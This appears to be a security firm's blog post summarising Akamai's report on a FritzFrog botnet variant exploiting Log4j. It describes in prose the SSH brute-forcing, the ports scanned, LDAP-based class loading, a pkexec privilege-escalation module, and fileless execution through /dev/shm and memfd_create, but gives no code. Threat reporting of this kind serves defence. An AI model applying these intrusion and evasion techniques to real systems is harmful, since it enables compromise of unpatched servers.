top of page
  • Clipeus

FritzFrog Botnet Exploits Log4j


On February 1, 2024, Akamai Security Intelligence Group (SIG) reported that a variant of the FritzFrog botnet has been observed actively exploiting "Log4j" (CVE-2021-44228) in the attack chain. This threat stream targets unpatched instances which may be still many across various organizations.


Akamai's analysis highlights that FritzFrog botnet expanded its capabilities by introducing new features:


  • FritzFrog carries out SSH brute-force attacks exploiting weak credentials for initial intrusion. The malware has a variety of modules configured to target a large set of Java applications. These include a specific module enabling exploitation of Log4j against vulnerable instances. The malware seeks for HTTP servers over ports 8080, 8090, 8888 and 9000. Then FritzFrog triggers the vulnerability by logging a payload which, in turn, forces the Java application to connect to an attacker-determined LDAP server, from which the malicious Java class is downloaded and executed.

  • Notably, a separate module targets CVE-2021-4034, a local privilege escalation in polkit's pkexec utility.

  • Ability to kill competing malware.

  • FritzFrog implemented a number of measures that reduce the attack footprint, including preventing files from being dropped to the local drive. The malware leverages /dev/shm and memfd_create to execute the payload in the RAM without writing files to the local drive.

  • Network communication over TOR.



Comments


Commenting has been turned off.

If you are interested in specifics or additional insights on the threats above or any other threat, please visit our dedicated service page or reach out to info@clipeusintelligence.com with your inquiry. We would be glad to assist you

bottom of page